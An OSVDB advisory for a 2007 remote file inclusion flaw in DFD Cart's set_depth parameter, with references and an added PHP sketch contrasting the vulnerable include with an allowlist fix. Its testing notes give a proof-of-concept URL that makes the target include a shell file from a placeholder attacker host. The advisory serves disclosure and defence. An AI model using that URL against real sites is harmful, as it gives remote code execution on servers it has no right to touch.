DFD Cart customer.area/customer.browse.search.php set_depth Variable Remote File Inclusion

2007-09-24T00:00:00
ID OSVDB:37229
Type osvdb
Reporter OSVDB
Modified 2007-09-24T00:00:00

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://[attacker]/shell.txt?
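
The following sketch is an added illustration, not part of the OSVDB record and not DFD Cart's own source (which the record does not quote). It shows why register_globals turns an uninitialised variable into a remote file inclusion and what a hardened include of a request-selected view looks like. Only the parameter name set_depth comes from the record; the file names, the ALLOWED_DEPTHS table and the resolve_depth() helper are assumptions made for the example.

```php
<?php
// Added illustration, not DFD Cart code. Only the name set_depth is taken
// from the advisory; every path and helper below is assumed for the example.

// --- Vulnerable pattern (hypothetical) --------------------------------------
// With register_globals=On, a request such as ?set_depth=http://host/x.txt?
// creates $set_depth before this script runs. If the script never assigns the
// variable itself and uses it in include(), the request controls what is
// included, and with URL includes enabled that becomes remote code execution:
//
//   include($set_depth . '/customer.browse.search.inc.php');

// --- Hardened pattern -------------------------------------------------------
// 1. Never rely on register_globals: read input explicitly from $_GET.
// 2. Map the untrusted value onto an allowlist of local files.
// 3. Keep allow_url_include=Off (and allow_url_fopen=Off where the application
//    does not need it) so include() cannot fetch http:// or ftp:// targets even
//    if a check is missed elsewhere.

const BASE_DIR = __DIR__ . '/templates';

/** Accepted set_depth values and the local template each one selects. */
const ALLOWED_DEPTHS = [
    'root'    => 'root.inc.php',
    'catalog' => 'catalog.inc.php',
    'product' => 'product.inc.php',
];

/**
 * Turn the untrusted set_depth parameter into a local template path.
 * Unknown or malformed values fall back to the root view instead of being
 * interpolated into the path.
 */
function resolve_depth($requested): string
{
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_DEPTHS)) {
        $requested = 'root';
    }

    // Belt and braces: even though the allowlist already fixes the file name,
    // confirm the resolved path is inside BASE_DIR before including it.
    $baseReal = realpath(BASE_DIR);
    $real     = realpath(BASE_DIR . '/' . ALLOWED_DEPTHS[$requested]);
    if ($baseReal === false || $real === false
        || strncmp($real, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        throw new RuntimeException('template resolution failed');
    }
    return $real;
}

// Explicit input handling instead of register_globals: the variable is always
// initialised here, so a request cannot pre-populate it.
$setDepth = $_GET['set_depth'] ?? null;
include resolve_depth($setDepth);
```

The allowlist is the real fix; the realpath() check and the php.ini settings are defence in depth. register_globals was removed entirely in PHP 5.4, and allow_url_include (introduced in PHP 5.2) defaults to Off, so on a current PHP the exploit URL above would fail even against the vulnerable code; the advisory's note that register_globals has been off by default since 4.2.0 is the reason this class of bug was already rare in 2007.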

References:

Secunia Advisory ID: 26920
Related OSVDB ID: 37227
Related OSVDB ID: 37228
Other Advisory URL: http://milw0rm.com/exploits/4451
ISS X-Force ID: 36753
FrSIRT Advisory: ADV-2007-3255
CVE-2007-5098
Bugtraq ID: 25775